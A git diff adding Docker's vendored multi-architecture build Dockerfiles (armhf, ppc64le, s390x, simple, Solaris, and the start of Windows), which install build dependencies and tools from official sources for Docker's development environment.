apparmor pkcs11 seccomp selinux + +# Let us use a .bashrc file +RUN ln -sfv $PWD/.bashrc ~/.bashrc + +# Register Docker's bash completion. +RUN ln -sv $PWD/contrib/completion/bash/docker /etc/bash_completion.d/docker + +# Get useful and necessary Hub images so we can "docker load" locally instead of pulling +COPY contrib/download-frozen-image-v2.sh /go/src/github.com/docker/docker/contrib/ +RUN ./contrib/download-frozen-image-v2.sh /docker-frozen-images \ + aarch64/buildpack-deps:jessie@sha256:6aa1d6910791b7ac78265fd0798e5abd6cb3f27ae992f6f960f6c303ec9535f2 \ + aarch64/busybox:latest@sha256:b23a6a37cf269dff6e46d2473b6e227afa42b037e6d23435f1d2bc40fc8c2828 \ + aarch64/debian:jessie@sha256:4be74a41a7c70ebe887b634b11ffe516cf4fcd56864a54941e56bb49883c3170 \ + aarch64/hello-world:latest@sha256:65a4a158587b307bb02db4de41b836addb0c35175bdc801367b1ac1ddeb9afda +# See also "hack/make/.ensure-frozen-images" (which needs to be updated any time this list is) + +# Install tomlv, vndr, runc, containerd, tini, docker-proxy +# Please edit hack/dockerfile/install-binaries.sh to update them. +COPY hack/dockerfile/binaries-commits /tmp/binaries-commits +COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh +RUN /tmp/install-binaries.sh tomlv vndr runc containerd tini proxy + +# Wrap all commands in the "docker-in-docker" script to allow nested containers +ENTRYPOINT ["hack/dind"] + +# Upload docker source +COPY . /go/src/github.com/docker/docker diff --git a/vendor/github.com/docker/docker/Dockerfile.armhf b/vendor/github.com/docker/docker/Dockerfile.armhf new file mode 100644 index 0000000000..1aebc166b3 --- /dev/null +++ b/vendor/github.com/docker/docker/Dockerfile.armhf @@ -0,0 +1,182 @@ +# This file describes the standard way to build Docker on ARMv7, using docker +# +# Usage: +# +# # Assemble the full dev environment. This is slow the first time. +# docker build -t docker -f Dockerfile.armhf . +# +# # Mount your source in an interactive container for quick testing: +# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash +# +# # Run the test suite: +# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py +# +# Note: AppArmor used to mess with privileged mode, but this is no longer +# the case. Therefore, you don't have to disable it anymore. +# + +FROM armhf/debian:jessie + +# allow replacing httpredir or deb mirror +ARG APT_MIRROR=deb.debian.org +RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list + +# Packaged dependencies +RUN apt-get update && apt-get install -y \ + apparmor \ + aufs-tools \ + automake \ + bash-completion \ + btrfs-tools \ + build-essential \ + createrepo \ + curl \ + cmake \ + dpkg-sig \ + git \ + iptables \ + jq \ + net-tools \ + libapparmor-dev \ + libcap-dev \ + libltdl-dev \ + libsqlite3-dev \ + libsystemd-journal-dev \ + libtool \ + mercurial \ + pkg-config \ + python-dev \ + python-mock \ + python-pip \ + python-websocket \ + xfsprogs \ + tar \ + vim-common \ + --no-install-recommends \ + && pip install awscli==1.10.15 + +# Get lvm2 source for compiling statically +ENV LVM2_VERSION 2.02.103 +RUN mkdir -p /usr/local/lvm2 \ + && curl -fsSL "https://mirrors.kernel.org/sourceware/lvm2/LVM2.${LVM2_VERSION}.tgz" \ + | tar -xzC /usr/local/lvm2 --strip-components=1 +# See https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags + +# Compile and install lvm2 +RUN cd /usr/local/lvm2 \ + && ./configure \ + --build="$(gcc -print-multiarch)" \ + --enable-static_link \ + && make device-mapper \ + && make install_device-mapper +# See https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL + +# Install Go +ENV GO_VERSION 1.7.5 +RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" \ + | tar -xzC /usr/local +ENV PATH /go/bin:/usr/local/go/bin:$PATH +ENV GOPATH /go + +# We're building for armhf, which is ARMv7, so let's be explicit about that +ENV GOARCH arm +ENV GOARM 7 + +# Dependency for golint +ENV GO_TOOLS_COMMIT 823804e1ae08dbb14eb807afc7db9993bc9e3cc3 +RUN git clone https://github.com/golang/tools.git /go/src/golang.org/x/tools \ + && (cd /go/src/golang.org/x/tools && git checkout -q $GO_TOOLS_COMMIT) + +# Grab Go's lint tool +ENV GO_LINT_COMMIT 32a87160691b3c96046c0c678fe57c5bef761456 +RUN git clone https://github.com/golang/lint.git /go/src/github.com/golang/lint \ + && (cd /go/src/github.com/golang/lint && git checkout -q $GO_LINT_COMMIT) \ + && go install -v github.com/golang/lint/golint + +# Install seccomp: the version shipped in trusty is too old +ENV SECCOMP_VERSION 2.3.1 +RUN set -x \ + && export SECCOMP_PATH="$(mktemp -d)" \ + && curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \ + | tar -xzC "$SECCOMP_PATH" --strip-components=1 \ + && ( \ + cd "$SECCOMP_PATH" \ + && ./configure --prefix=/usr/local \ + && make \ + && make install \ + && ldconfig \ + ) \ + && rm -rf "$SECCOMP_PATH" + +# Install two versions of the registry. The first is an older version that +# only supports schema1 manifests. The second is a newer version that supports +# both. This allows integration-cli tests to cover push/pull with both schema1 +# and schema2 manifests. +ENV REGISTRY_COMMIT_SCHEMA1 ec87e9b6971d831f0eff752ddb54fb64693e51cd +ENV REGISTRY_COMMIT cb08de17d74bef86ce6c5abe8b240e282f5750be +RUN set -x \ + && export GOPATH="$(mktemp -d)" \ + && git clone https://github.com/docker/distribution.git "$GOPATH/src/github.com/docker/distribution" \ + && (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT") \ + && GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \ + go build -o /usr/local/bin/registry-v2 github.com/docker/distribution/cmd/registry \ + && (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT_SCHEMA1") \ + && GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \ + go build -o /usr/local/bin/registry-v2-schema1 github.com/docker/distribution/cmd/registry \ + && rm -rf "$GOPATH" + +# Install notary and notary-server +ENV NOTARY_VERSION v0.4.2 +RUN set -x \ + && export GOPATH="$(mktemp -d)" \ + && git clone https://github.com/docker/notary.git "$GOPATH/src/github.com/docker/notary" \ + && (cd "$GOPATH/src/github.com/docker/notary" && git checkout -q "$NOTARY_VERSION") \ + && GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \ + go build -o /usr/local/bin/notary-server github.com/docker/notary/cmd/notary-server \ + && GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \ + go build -o /usr/local/bin/notary github.com/docker/notary/cmd/notary \ + && rm -rf "$GOPATH" + +# Get the "docker-py" source so we can run their integration tests +ENV DOCKER_PY_COMMIT e2655f658408f9ad1f62abdef3eb6ed43c0cf324 +RUN git clone https://github.com/docker/docker-py.git /docker-py \ + && cd /docker-py \ + && git checkout -q $DOCKER_PY_COMMIT \ + && pip install -r test-requirements.txt + +# Set user.email so crosbymichael's in-container merge commits go smoothly +RUN git config --global user.email 'docker-dummy@example.com' + +# Add an unprivileged user to be used for tests which need it +RUN groupadd -r docker +RUN useradd --create-home --gid docker unprivilegeduser + +VOLUME /var/lib/docker +WORKDIR /go/src/github.com/docker/docker +ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux + +# Let us use a .bashrc file +RUN ln -sfv $PWD/.bashrc ~/.bashrc + +# Register Docker's bash completion. +RUN ln -sv $PWD/contrib/completion/bash/docker /etc/bash_completion.d/docker + +# Get useful and necessary Hub images so we can "docker load" locally instead of pulling +COPY contrib/download-frozen-image-v2.sh /go/src/github.com/docker/docker/contrib/ +RUN ./contrib/download-frozen-image-v2.sh /docker-frozen-images \ + armhf/buildpack-deps:jessie@sha256:ca6cce8e5bf5c952129889b5cc15cd6aa8d995d77e55e3749bbaadae50e476cb \ + armhf/busybox:latest@sha256:d98a7343ac750ffe387e3d514f8521ba69846c216778919b01414b8617cfb3d4 \ + armhf/debian:jessie@sha256:4a2187483f04a84f9830910fe3581d69b3c985cc045d9f01d8e2f3795b28107b \ + armhf/hello-world:latest@sha256:161dcecea0225975b2ad5f768058212c1e0d39e8211098666ffa1ac74cfb7791 +# See also "hack/make/.ensure-frozen-images" (which needs to be updated any time this list is) + +# Install tomlv, vndr, runc, containerd, tini, docker-proxy +# Please edit hack/dockerfile/install-binaries.sh to update them. +COPY hack/dockerfile/binaries-commits /tmp/binaries-commits +COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh +RUN /tmp/install-binaries.sh tomlv vndr runc containerd tini proxy + +ENTRYPOINT ["hack/dind"] + +# Upload docker source +COPY . /go/src/github.com/docker/docker diff --git a/vendor/github.com/docker/docker/Dockerfile.ppc64le b/vendor/github.com/docker/docker/Dockerfile.ppc64le new file mode 100644 index 0000000000..1f9f5006ff --- /dev/null +++ b/vendor/github.com/docker/docker/Dockerfile.ppc64le @@ -0,0 +1,188 @@ +# This file describes the standard way to build Docker on ppc64le, using docker +# +# Usage: +# +# # Assemble the full dev environment. This is slow the first time. +# docker build -t docker -f Dockerfile.ppc64le . +# +# # Mount your source in an interactive container for quick testing: +# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash +# +# # Run the test suite: +# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py +# +# Note: AppArmor used to mess with privileged mode, but this is no longer +# the case. Therefore, you don't have to disable it anymore. +# + +FROM ppc64le/debian:jessie + +# allow replacing httpredir or deb mirror +ARG APT_MIRROR=deb.debian.org +RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list + +# Packaged dependencies +RUN apt-get update && apt-get install -y \ + apparmor \ + aufs-tools \ + automake \ + bash-completion \ + btrfs-tools \ + build-essential \ + cmake \ + createrepo \ + curl \ + dpkg-sig \ + git \ + iptables \ + jq \ + net-tools \ + libapparmor-dev \ + libcap-dev \ + libltdl-dev \ + libsqlite3-dev \ + libsystemd-journal-dev \ + libtool \ + mercurial \ + pkg-config \ + python-dev \ + python-mock \ + python-pip \ + python-websocket \ + xfsprogs \ + tar \ + vim-common \ + --no-install-recommends + +# Get lvm2 source for compiling statically +ENV LVM2_VERSION 2.02.103 +RUN mkdir -p /usr/local/lvm2 \ + && curl -fsSL "https://mirrors.kernel.org/sourceware/lvm2/LVM2.${LVM2_VERSION}.tgz" \ + | tar -xzC /usr/local/lvm2 --strip-components=1 +# See https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags + +# Fix platform enablement in lvm2 to support ppc64le properly +RUN set -e \ + && for f in config.guess config.sub; do \ + curl -fsSL -o "/usr/local/lvm2/autoconf/$f" "http://git.savannah.gnu.org/gitweb/?p=config.git;a=blob_plain;f=$f;hb=HEAD"; \ + done +# "arch.c:78:2: error: #error the arch code needs to know about your machine type" + +# Compile and install lvm2 +RUN cd /usr/local/lvm2 \ + && ./configure \ + --build="$(gcc -print-multiarch)" \ + --enable-static_link \ + && make device-mapper \ + && make install_device-mapper +# See https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL + +# Install seccomp: the version shipped in jessie is too old +ENV SECCOMP_VERSION 2.3.1 +RUN set -x \ + && export SECCOMP_PATH="$(mktemp -d)" \ + && curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \ + | tar -xzC "$SECCOMP_PATH" --strip-components=1 \ + && ( \ + cd "$SECCOMP_PATH" \ + && ./configure --prefix=/usr/local \ + && make \ + && make install \ + && ldconfig \ + ) \ + && rm -rf "$SECCOMP_PATH" + + +# Install Go +# NOTE: official ppc64le go binaries weren't available until go 1.6.4 and 1.7.4 +ENV GO_VERSION 1.7.5 +RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" \ + | tar -xzC /usr/local + +ENV PATH /go/bin:/usr/local/go/bin:$PATH +ENV GOPATH /go + +# Dependency for golint +ENV GO_TOOLS_COMMIT 823804e1ae08dbb14eb807afc7db9993bc9e3cc3 +RUN git clone https://github.com/golang/tools.git /go/src/golang.org/x/tools \ + && (cd /go/src/golang.org/x/tools && git checkout -q $GO_TOOLS_COMMIT) + +# Grab Go's lint tool +ENV GO_LINT_COMMIT 32a87160691b3c96046c0c678fe57c5bef761456 +RUN git clone https://github.com/golang/lint.git /go/src/github.com/golang/lint \ + && (cd /go/src/github.com/golang/lint && git checkout -q $GO_LINT_COMMIT) \ + && go install -v github.com/golang/lint/golint + +# Install two versions of the registry. The first is an older version that +# only supports schema1 manifests. The second is a newer version that supports +# both. This allows integration-cli tests to cover push/pull with both schema1 +# and schema2 manifests. +ENV REGISTRY_COMMIT_SCHEMA1 ec87e9b6971d831f0eff752ddb54fb64693e51cd +ENV REGISTRY_COMMIT 47a064d4195a9b56133891bbb13620c3ac83a827 +RUN set -x \ + && export GOPATH="$(mktemp -d)" \ + && git clone https://github.com/docker/distribution.git "$GOPATH/src/github.com/docker/distribution" \ + && (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT") \ + && GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \ + go build -o /usr/local/bin/registry-v2 github.com/docker/distribution/cmd/registry \ + && (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT_SCHEMA1") \ + && GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \ + go build -o /usr/local/bin/registry-v2-schema1 github.com/docker/distribution/cmd/registry \ + && rm -rf "$GOPATH" + +# Install notary and notary-server +ENV NOTARY_VERSION v0.4.2 +RUN set -x \ + && export GOPATH="$(mktemp -d)" \ + && git clone https://github.com/docker/notary.git "$GOPATH/src/github.com/docker/notary" \ + && (cd "$GOPATH/src/github.com/docker/notary" && git checkout -q "$NOTARY_VERSION") \ + && GOPATH="$GOPATH/src/github.com/docker/notary/Godeps/_workspace:$GOPATH" \ + go build -o /usr/local/bin/notary-server github.com/docker/notary/cmd/notary-server \ + && GOPATH="$GOPATH/src/github.com/docker/notary/Godeps/_workspace:$GOPATH" \ + go build -o /usr/local/bin/notary github.com/docker/notary/cmd/notary \ + && rm -rf "$GOPATH" + +# Get the "docker-py" source so we can run their integration tests +ENV DOCKER_PY_COMMIT e2655f658408f9ad1f62abdef3eb6ed43c0cf324 +RUN git clone https://github.com/docker/docker-py.git /docker-py \ + && cd /docker-py \ + && git checkout -q $DOCKER_PY_COMMIT \ + && pip install -r test-requirements.txt + +# Set user.email so crosbymichael's in-container merge commits go smoothly +RUN git config --global user.email 'docker-dummy@example.com' + +# Add an unprivileged user to be used for tests which need it +RUN groupadd -r docker +RUN useradd --create-home --gid docker unprivilegeduser + +VOLUME /var/lib/docker +WORKDIR /go/src/github.com/docker/docker +ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux + +# Let us use a .bashrc file +RUN ln -sfv $PWD/.bashrc ~/.bashrc + +# Register Docker's bash completion. +RUN ln -sv $PWD/contrib/completion/bash/docker /etc/bash_completion.d/docker + +# Get useful and necessary Hub images so we can "docker load" locally instead of pulling +COPY contrib/download-frozen-image-v2.sh /go/src/github.com/docker/docker/contrib/ +RUN ./contrib/download-frozen-image-v2.sh /docker-frozen-images \ + ppc64le/buildpack-deps:jessie@sha256:902bfe4ef1389f94d143d64516dd50a2de75bca2e66d4a44b1d73f63ddf05dda \ + ppc64le/busybox:latest@sha256:38bb82085248d5a3c24bd7a5dc146f2f2c191e189da0441f1c2ca560e3fc6f1b \ + ppc64le/debian:jessie@sha256:412845f51b6ab662afba71bc7a716e20fdb9b84f185d180d4c7504f8a75c4f91 \ + ppc64le/hello-world:latest@sha256:186a40a9a02ca26df0b6c8acdfb8ac2f3ae6678996a838f977e57fac9d963974 +# See also "hack/make/.ensure-frozen-images" (which needs to be updated any time this list is) + +# Install tomlv, vndr, runc, containerd, tini, docker-proxy +# Please edit hack/dockerfile/install-binaries.sh to update them. +COPY hack/dockerfile/binaries-commits /tmp/binaries-commits +COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh +RUN /tmp/install-binaries.sh tomlv vndr runc containerd tini proxy + +# Wrap all commands in the "docker-in-docker" script to allow nested containers +ENTRYPOINT ["hack/dind"] + +# Upload docker source +COPY . /go/src/github.com/docker/docker diff --git a/vendor/github.com/docker/docker/Dockerfile.s390x b/vendor/github.com/docker/docker/Dockerfile.s390x new file mode 100644 index 0000000000..ba94bc70aa --- /dev/null +++ b/vendor/github.com/docker/docker/Dockerfile.s390x @@ -0,0 +1,190 @@ +# This file describes the standard way to build Docker on s390x, using docker +# +# Usage: +# +# # Assemble the full dev environment. This is slow the first time. +# docker build -t docker -f Dockerfile.s390x . +# +# # Mount your source in an interactive container for quick testing: +# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash +# +# # Run the test suite: +# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py +# +# Note: AppArmor used to mess with privileged mode, but this is no longer +# the case. Therefore, you don't have to disable it anymore. +# + +FROM s390x/gcc:6.1 + +# Packaged dependencies +RUN apt-get update && apt-get install -y \ + apparmor \ + aufs-tools \ + automake \ + bash-completion \ + btrfs-tools \ + build-essential \ + cmake \ + createrepo \ + curl \ + dpkg-sig \ + git \ + iptables \ + jq \ + net-tools \ + libapparmor-dev \ + libcap-dev \ + libltdl-dev \ + libsqlite3-dev \ + libsystemd-journal-dev \ + libtool \ + mercurial \ + pkg-config \ + python-dev \ + python-mock \ + python-pip \ + python-websocket \ + xfsprogs \ + tar \ + vim-common \ + --no-install-recommends + +# glibc in Debian has a bug specific to s390x that won't be fixed until Debian 8.6 is released +# - https://github.com/docker/docker/issues/24748 +# - https://sourceware.org/git/?p=glibc.git;a=commit;h=890b7a4b33d482b5c768ab47d70758b80227e9bc +# - https://sourceware.org/git/?p=glibc.git;a=commit;h=2e807f29595eb5b1e5d0decc6e356a3562ecc58e +RUN echo 'deb http://httpredir.debian.org/debian jessie-proposed-updates main' >> /etc/apt/sources.list.d/pu.list \ + && apt-get update \ + && apt-get install -y libc6 \ + && rm -rf /var/lib/apt/lists/* + +# Install seccomp: the version shipped in jessie is too old +ENV SECCOMP_VERSION 2.3.1 +RUN set -x \ + && export SECCOMP_PATH="$(mktemp -d)" \ + && curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \ + | tar -xzC "$SECCOMP_PATH" --strip-components=1 \ + && ( \ + cd "$SECCOMP_PATH" \ + && ./configure --prefix=/usr/local \ + && make \ + && make install \ + && ldconfig \ + ) \ + && rm -rf "$SECCOMP_PATH" + +# Get lvm2 source for compiling statically +ENV LVM2_VERSION 2.02.103 +RUN mkdir -p /usr/local/lvm2 \ + && curl -fsSL "https://mirrors.kernel.org/sourceware/lvm2/LVM2.${LVM2_VERSION}.tgz" \ + | tar -xzC /usr/local/lvm2 --strip-components=1 +# See https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags + +# Fix platform enablement in lvm2 to support s390x properly +RUN set -e \ + && for f in config.guess config.sub; do \ + curl -fsSL -o "/usr/local/lvm2/autoconf/$f" "http://git.savannah.gnu.org/gitweb/?p=config.git;a=blob_plain;f=$f;hb=HEAD"; \ + done +# "arch.c:78:2: error: #error the arch code needs to know about your machine type" + +# Compile and install lvm2 +RUN cd /usr/local/lvm2 \ + && ./configure \ + --build="$(gcc -print-multiarch)" \ + --enable-static_link \ + && make device-mapper \ + && make install_device-mapper +# See https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL + +ENV GO_VERSION 1.7.5 +RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-s390x.tar.gz" \ + | tar -xzC /usr/local + +ENV PATH /go/bin:/usr/local/go/bin:$PATH +ENV GOPATH /go + +# Dependency for golint +ENV GO_TOOLS_COMMIT 823804e1ae08dbb14eb807afc7db9993bc9e3cc3 +RUN git clone https://github.com/golang/tools.git /go/src/golang.org/x/tools \ + && (cd /go/src/golang.org/x/tools && git checkout -q $GO_TOOLS_COMMIT) + +# Grab Go's lint tool +ENV GO_LINT_COMMIT 32a87160691b3c96046c0c678fe57c5bef761456 +RUN git clone https://github.com/golang/lint.git /go/src/github.com/golang/lint \ + && (cd /go/src/github.com/golang/lint && git checkout -q $GO_LINT_COMMIT) \ + && go install -v github.com/golang/lint/golint + +# Install two versions of the registry. The first is an older version that +# only supports schema1 manifests. The second is a newer version that supports +# both. This allows integration-cli tests to cover push/pull with both schema1 +# and schema2 manifests. +ENV REGISTRY_COMMIT_SCHEMA1 ec87e9b6971d831f0eff752ddb54fb64693e51cd +ENV REGISTRY_COMMIT 47a064d4195a9b56133891bbb13620c3ac83a827 +RUN set -x \ + && export GOPATH="$(mktemp -d)" \ + && git clone https://github.com/docker/distribution.git "$GOPATH/src/github.com/docker/distribution" \ + && (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT") \ + && GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \ + go build -o /usr/local/bin/registry-v2 github.com/docker/distribution/cmd/registry \ + && (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT_SCHEMA1") \ + && GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \ + go build -o /usr/local/bin/registry-v2-schema1 github.com/docker/distribution/cmd/registry \ + && rm -rf "$GOPATH" + +# Install notary and notary-server +ENV NOTARY_VERSION v0.4.2 +RUN set -x \ + && export GOPATH="$(mktemp -d)" \ + && git clone https://github.com/docker/notary.git "$GOPATH/src/github.com/docker/notary" \ + && (cd "$GOPATH/src/github.com/docker/notary" && git checkout -q "$NOTARY_VERSION") \ + && GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \ + go build -o /usr/local/bin/notary-server github.com/docker/notary/cmd/notary-server \ + && GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \ + go build -o /usr/local/bin/notary github.com/docker/notary/cmd/notary \ + && rm -rf "$GOPATH" + +# Get the "docker-py" source so we can run their integration tests +ENV DOCKER_PY_COMMIT e2655f658408f9ad1f62abdef3eb6ed43c0cf324 +RUN git clone https://github.com/docker/docker-py.git /docker-py \ + && cd /docker-py \ + && git checkout -q $DOCKER_PY_COMMIT \ + && pip install -r test-requirements.txt + +# Set user.email so crosbymichael's in-container merge commits go smoothly +RUN git config --global user.email 'docker-dummy@example.com' + +# Add an unprivileged user to be used for tests which need it +RUN groupadd -r docker +RUN useradd --create-home --gid docker unprivilegeduser + +VOLUME /var/lib/docker +WORKDIR /go/src/github.com/docker/docker +ENV DOCKER_BUILDTAGS apparmor selinux seccomp + +# Let us use a .bashrc file +RUN ln -sfv $PWD/.bashrc ~/.bashrc + +# Register Docker's bash completion. +RUN ln -sv $PWD/contrib/completion/bash/docker /etc/bash_completion.d/docker + +# Get useful and necessary Hub images so we can "docker load" locally instead of pulling +COPY contrib/download-frozen-image-v2.sh /go/src/github.com/docker/docker/contrib/ +RUN ./contrib/download-frozen-image-v2.sh /docker-frozen-images \ + s390x/buildpack-deps:jessie@sha256:4d1381224acaca6c4bfe3604de3af6972083a8558a99672cb6989c7541780099 \ + s390x/busybox:latest@sha256:dd61522c983884a66ed72d60301925889028c6d2d5e0220a8fe1d9b4c6a4f01b \ + s390x/debian:jessie@sha256:b74c863400909eff3c5e196cac9bfd1f6333ce47aae6a38398d87d5875da170a \ + s390x/hello-world:latest@sha256:780d80b3a7677c3788c0d5cd9168281320c8d4a6d9183892d8ee5cdd610f5699 +# See also "hack/make/.ensure-frozen-images" (which needs to be updated any time this list is) + +# Install tomlv, vndr, runc, containerd, tini, docker-proxy +# Please edit hack/dockerfile/install-binaries.sh to update them. +COPY hack/dockerfile/binaries-commits /tmp/binaries-commits +COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh +RUN /tmp/install-binaries.sh tomlv vndr runc containerd tini proxy + +# Wrap all commands in the "docker-in-docker" script to allow nested containers +ENTRYPOINT ["hack/dind"] + +# Upload docker source +COPY . /go/src/github.com/docker/docker diff --git a/vendor/github.com/docker/docker/Dockerfile.simple b/vendor/github.com/docker/docker/Dockerfile.simple new file mode 100644 index 0000000000..8eeb3d96bb --- /dev/null +++ b/vendor/github.com/docker/docker/Dockerfile.simple @@ -0,0 +1,73 @@ +# docker build -t docker:simple -f Dockerfile.simple . +# docker run --rm docker:simple hack/make.sh dynbinary +# docker run --rm --privileged docker:simple hack/dind hack/make.sh test-unit +# docker run --rm --privileged -v /var/lib/docker docker:simple hack/dind hack/make.sh dynbinary test-integration-cli + +# This represents the bare minimum required to build and test Docker. + +FROM debian:jessie + +# allow replacing httpredir or deb mirror +ARG APT_MIRROR=deb.debian.org +RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list + +# Compile and runtime deps +# https://github.com/docker/docker/blob/master/project/PACKAGERS.md#build-dependencies +# https://github.com/docker/docker/blob/master/project/PACKAGERS.md#runtime-dependencies +RUN apt-get update && apt-get install -y --no-install-recommends \ + btrfs-tools \ + build-essential \ + curl \ + cmake \ + gcc \ + git \ + libapparmor-dev \ + libdevmapper-dev \ + libsqlite3-dev \ + \ + ca-certificates \ + e2fsprogs \ + iptables \ + procps \ + xfsprogs \ + xz-utils \ + \ + aufs-tools \ + vim-common \ + && rm -rf /var/lib/apt/lists/* + +# Install seccomp: the version shipped in trusty is too old +ENV SECCOMP_VERSION 2.3.1 +RUN set -x \ + && export SECCOMP_PATH="$(mktemp -d)" \ + && curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \ + | tar -xzC "$SECCOMP_PATH" --strip-components=1 \ + && ( \ + cd "$SECCOMP_PATH" \ + && ./configure --prefix=/usr/local \ + && make \ + && make install \ + && ldconfig \ + ) \ + && rm -rf "$SECCOMP_PATH" + +# Install Go +# IMPORTANT: If the version of Go is updated, the Windows to Linux CI machines +# will need updating, to avoid errors. Ping #docker-maintainers on IRC +# with a heads-up. +ENV GO_VERSION 1.7.5 +RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" \ + | tar -xzC /usr/local +ENV PATH /go/bin:/usr/local/go/bin:$PATH +ENV GOPATH /go +ENV CGO_LDFLAGS -L/lib + +# Install runc, containerd, tini and docker-proxy +# Please edit hack/dockerfile/install-binaries.sh to update them. +COPY hack/dockerfile/binaries-commits /tmp/binaries-commits +COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh +RUN /tmp/install-binaries.sh runc containerd tini proxy + +ENV AUTO_GOPATH 1 +WORKDIR /usr/src/docker +COPY . /usr/src/docker diff --git a/vendor/github.com/docker/docker/Dockerfile.solaris b/vendor/github.com/docker/docker/Dockerfile.solaris new file mode 100644 index 0000000000..bb342e5e6a --- /dev/null +++ b/vendor/github.com/docker/docker/Dockerfile.solaris @@ -0,0 +1,20 @@ +# Defines an image that hosts a native Docker build environment for Solaris +# TODO: Improve stub + +FROM solaris:latest + +# compile and runtime deps +RUN pkg install --accept \ + git \ + gnu-coreutils \ + gnu-make \ + gnu-tar \ + diagnostic/top \ + golang \ + library/golang/* \ + developer/gcc-* + +ENV GOPATH /go/:/usr/lib/gocode/1.5/ +ENV DOCKER_CROSSPLATFORMS solaris/amd64 +WORKDIR /go/src/github.com/docker/docker +COPY . /go/src/github.com/docker/docker diff --git a/vendor/github.com/docker/docker/Dockerfile.windows b/vendor/github.com/docker/docker/Dockerfile.windows new file mode 100644 index 0000000000..652d07275e --- /dev/null +++ b/vendor/github.com/docker/docker/Dockerfile.windows @@ -0,0 +1,267 @@ +# escape=` + +# ----------------------------------------------------------------------------------------- +# This file describes the standard way to build Docker in a container on Windows +# Server 2016 or Windows 10. +# +# Maintainer: @jhowardmsft +# ----------------------------------------------------------------------------------------- + + +# Prerequisites: +# -------------- +# +# 1. Windows Server 2016 or Windows 10 with all Windows updates applied. The major +# build number must be at least 14393. This can be confirmed, for example, by +# running the following from an elevated PowerShell prompt - this sample output +# is from a fully up to date machine as at mid-November 2016: +# +# >> PS C:\> $(gin).WindowsBuildLabEx +# >> 14393.447.amd64fre.rs1_release_inmarket.161102-0100 +# +# 2. Git for Windows (or another git client) must be installed. https://git-scm.com/download/win. +# +# 3. The machine must be configured to run containers. For example, by following +# the quick start guidance at https://msdn.microsoft.com/en-us/virtualization/windowscontainers/quick_start/quick_start or +# https://github.com/docker/labs/blob/master/windows/windows-containers/Setup.md +# +# 4. If building in a Hyper-V VM: For Windows Server 2016 using Windows Server +# containers as the default option, it is recommended you have at least 1GB +# of memory assigned; For Windows 10 where Hyper-V Containers are employed, you +# should have at least 4GB of memory assigned. Note also, to run Hyper-V +# containers in a VM, it is necessary to configure the VM for nested virtualization. + +# ----------------------------------------------------------------------------------------- + + +# Usage: +# ----- +# +# The following steps should be run from an (elevated*) Windows PowerShell prompt. +# +# (*In a default installation of containers on Windows following the quick-start guidance at +# https://msdn.microsoft.com/en-us/virtualization/windowscontainers/quick_start/quick_start, +# the docker.exe client must run elevated to be able to connect to the daemon). +# +# 1. Clone the sources from github.com: +# +# >> git clone https://github.com/docker/docker.git C:\go\src\github.com\docker\docker +# >> Cloning into 'C:\go\src\github.com\docker\docker'... +# >> remote: Counting objects: 186216, done. +# >> remote: Compressing objects: 100% (21/21), done. +# >> remote: Total 186216 (delta 5), reused 0 (delta 0), pack-reused 186195 +# >> Receiving objects: 100% (186216/186216), 104.32 MiB | 8.18 MiB/s, done. 